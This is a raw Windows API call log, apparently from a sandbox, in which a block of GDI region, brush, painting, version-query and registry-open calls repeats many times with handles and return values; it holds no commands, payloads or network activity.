CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4b0401dc [0090.486] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4d0401d9 [0090.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045893 [0090.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045894 [0090.486] CombineRgn (hrgnDst=0x1045893, hrgnSrc1=0x4b0401dc, hrgnSrc2=0x4d0401d9, iMode=1) returned 1 [0090.486] CombineRgn (hrgnDst=0x1045894, hrgnSrc1=0x4b0401dc, hrgnSrc2=0x4d0401d9, iMode=4) returned 2 [0090.486] CreateSolidBrush (color=0xff) returned 0x2105892 [0090.486] CreateSolidBrush (color=0xff0000) returned 0x1105895 [0090.486] DeleteObject (ho=0x1105895) returned 1 [0090.486] DeleteObject (ho=0x4d0401d9) returned 1 [0090.486] DeleteObject (ho=0x4b0401dc) returned 1 [0090.486] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.486] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.486] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.486] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.486] BeginPath (hdc=0x0) returned 0 [0090.486] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.486] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.486] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.486] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.486] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4e0401d9 [0090.486] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4c0401dc [0090.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045896 [0090.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045897 [0090.486] CombineRgn (hrgnDst=0x1045896, hrgnSrc1=0x4e0401d9, hrgnSrc2=0x4c0401dc, iMode=1) returned 1 [0090.486] CombineRgn (hrgnDst=0x1045897, hrgnSrc1=0x4e0401d9, hrgnSrc2=0x4c0401dc, iMode=4) returned 2 [0090.486] CreateSolidBrush (color=0xff) returned 0x2105895 [0090.487] CreateSolidBrush (color=0xff0000) returned 0x1105898 [0090.487] DeleteObject (ho=0x1105898) returned 1 [0090.487] DeleteObject (ho=0x4c0401dc) returned 1 [0090.487] DeleteObject (ho=0x4e0401d9) returned 1 [0090.487] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.487] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.487] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.487] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.487] BeginPath (hdc=0x0) returned 0 [0090.487] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.487] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.487] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.487] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.487] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.487] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.487] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4d0401dc [0090.487] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4f0401d9 [0090.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045899 [0090.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104589a [0090.487] CombineRgn (hrgnDst=0x1045899, hrgnSrc1=0x4d0401dc, hrgnSrc2=0x4f0401d9, iMode=1) returned 1 [0090.487] CombineRgn (hrgnDst=0x104589a, hrgnSrc1=0x4d0401dc, hrgnSrc2=0x4f0401d9, iMode=4) returned 2 [0090.487] CreateSolidBrush (color=0xff) returned 0x2105898 [0090.487] CreateSolidBrush (color=0xff0000) returned 0x110589b [0090.487] DeleteObject (ho=0x110589b) returned 1 [0090.487] DeleteObject (ho=0x4f0401d9) returned 1 [0090.487] DeleteObject (ho=0x4d0401dc) returned 1 [0090.487] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.487] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.488] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.488] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.488] BeginPath (hdc=0x0) returned 0 [0090.488] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.488] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.488] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.488] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.488] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.488] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x500401d9 [0090.488] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4e0401dc [0090.488] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104589c [0090.488] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104589d [0090.488] CombineRgn (hrgnDst=0x104589c, hrgnSrc1=0x500401d9, hrgnSrc2=0x4e0401dc, iMode=1) returned 1 [0090.488] CombineRgn (hrgnDst=0x104589d, hrgnSrc1=0x500401d9, hrgnSrc2=0x4e0401dc, iMode=4) returned 2 [0090.488] CreateSolidBrush (color=0xff) returned 0x210589b [0090.488] CreateSolidBrush (color=0xff0000) returned 0x110589e [0090.488] DeleteObject (ho=0x110589e) returned 1 [0090.488] DeleteObject (ho=0x4e0401dc) returned 1 [0090.488] DeleteObject (ho=0x500401d9) returned 1 [0090.488] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.488] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.488] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.488] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.488] BeginPath (hdc=0x0) returned 0 [0090.488] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.489] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.489] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.489] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.489] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4f0401dc [0090.489] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x510401d9 [0090.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104589f [0090.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458a0 [0090.489] CombineRgn (hrgnDst=0x104589f, hrgnSrc1=0x4f0401dc, hrgnSrc2=0x510401d9, iMode=1) returned 1 [0090.489] CombineRgn (hrgnDst=0x10458a0, hrgnSrc1=0x4f0401dc, hrgnSrc2=0x510401d9, iMode=4) returned 2 [0090.489] CreateSolidBrush (color=0xff) returned 0x210589e [0090.489] CreateSolidBrush (color=0xff0000) returned 0x11058a1 [0090.489] DeleteObject (ho=0x11058a1) returned 1 [0090.489] DeleteObject (ho=0x510401d9) returned 1 [0090.489] DeleteObject (ho=0x4f0401dc) returned 1 [0090.489] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.489] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.489] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.489] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.489] BeginPath (hdc=0x0) returned 0 [0090.489] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.489] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.489] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.490] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.490] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x520401d9 [0090.490] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x500401dc [0090.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458a2 [0090.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458a3 [0090.490] CombineRgn (hrgnDst=0x10458a2, hrgnSrc1=0x520401d9, hrgnSrc2=0x500401dc, iMode=1) returned 1 [0090.490] CombineRgn (hrgnDst=0x10458a3, hrgnSrc1=0x520401d9, hrgnSrc2=0x500401dc, iMode=4) returned 2 [0090.490] CreateSolidBrush (color=0xff) returned 0x21058a1 [0090.490] CreateSolidBrush (color=0xff0000) returned 0x11058a4 [0090.490] DeleteObject (ho=0x11058a4) returned 1 [0090.490] DeleteObject (ho=0x500401dc) returned 1 [0090.490] DeleteObject (ho=0x520401d9) returned 1 [0090.490] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.490] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.490] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.490] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.490] BeginPath (hdc=0x0) returned 0 [0090.490] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.490] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.490] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.490] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.491] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x510401dc [0090.491] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x530401d9 [0090.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458a5 [0090.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458a6 [0090.491] CombineRgn (hrgnDst=0x10458a5, hrgnSrc1=0x510401dc, hrgnSrc2=0x530401d9, iMode=1) returned 1 [0090.491] CombineRgn (hrgnDst=0x10458a6, hrgnSrc1=0x510401dc, hrgnSrc2=0x530401d9, iMode=4) returned 2 [0090.491] CreateSolidBrush (color=0xff) returned 0x21058a4 [0090.491] CreateSolidBrush (color=0xff0000) returned 0x11058a7 [0090.491] DeleteObject (ho=0x11058a7) returned 1 [0090.491] DeleteObject (ho=0x530401d9) returned 1 [0090.491] DeleteObject (ho=0x510401dc) returned 1 [0090.491] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.491] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.491] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.491] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.491] BeginPath (hdc=0x0) returned 0 [0090.491] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.491] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.491] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.491] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.491] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x540401d9 [0090.491] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x520401dc [0090.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458a8 [0090.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458a9 [0090.492] CombineRgn (hrgnDst=0x10458a8, hrgnSrc1=0x540401d9, hrgnSrc2=0x520401dc, iMode=1) returned 1 [0090.492] CombineRgn (hrgnDst=0x10458a9, hrgnSrc1=0x540401d9, hrgnSrc2=0x520401dc, iMode=4) returned 2 [0090.492] CreateSolidBrush (color=0xff) returned 0x21058a7 [0090.492] CreateSolidBrush (color=0xff0000) returned 0x11058aa [0090.492] DeleteObject (ho=0x11058aa) returned 1 [0090.492] DeleteObject (ho=0x520401dc) returned 1 [0090.492] DeleteObject (ho=0x540401d9) returned 1 [0090.492] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.492] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.492] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.492] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.492] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.492] BeginPath (hdc=0x0) returned 0 [0090.492] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.492] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.501] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.501] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.501] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.501] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.501] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.501] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.501] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x530401dc [0090.501] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x550401d9 [0090.501] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458ab [0090.501] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458ac [0090.501] CombineRgn (hrgnDst=0x10458ab, hrgnSrc1=0x530401dc, hrgnSrc2=0x550401d9, iMode=1) returned 1 [0090.501] CombineRgn (hrgnDst=0x10458ac, hrgnSrc1=0x530401dc, hrgnSrc2=0x550401d9, iMode=4) returned 2 [0090.502] CreateSolidBrush (color=0xff) returned 0x21058aa [0090.502] CreateSolidBrush (color=0xff0000) returned 0x11058ad [0090.502] DeleteObject (ho=0x11058ad) returned 1 [0090.502] DeleteObject (ho=0x550401d9) returned 1 [0090.502] DeleteObject (ho=0x530401dc) returned 1 [0090.502] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.502] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.502] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.502] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.502] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.502] BeginPath (hdc=0x0) returned 0 [0090.502] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.502] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.502] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.502] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.502] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.502] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x560401d9 [0090.502] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x540401dc [0090.502] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458ae [0090.502] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458af [0090.502] CombineRgn (hrgnDst=0x10458ae, hrgnSrc1=0x560401d9, hrgnSrc2=0x540401dc, iMode=1) returned 1 [0090.502] CombineRgn (hrgnDst=0x10458af, hrgnSrc1=0x560401d9, hrgnSrc2=0x540401dc, iMode=4) returned 2 [0090.502] CreateSolidBrush (color=0xff) returned 0x21058ad [0090.502] CreateSolidBrush (color=0xff0000) returned 0x11058b0 [0090.502] DeleteObject (ho=0x11058b0) returned 1 [0090.502] DeleteObject (ho=0x540401dc) returned 1 [0090.503] DeleteObject (ho=0x560401d9) returned 1 [0090.503] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: 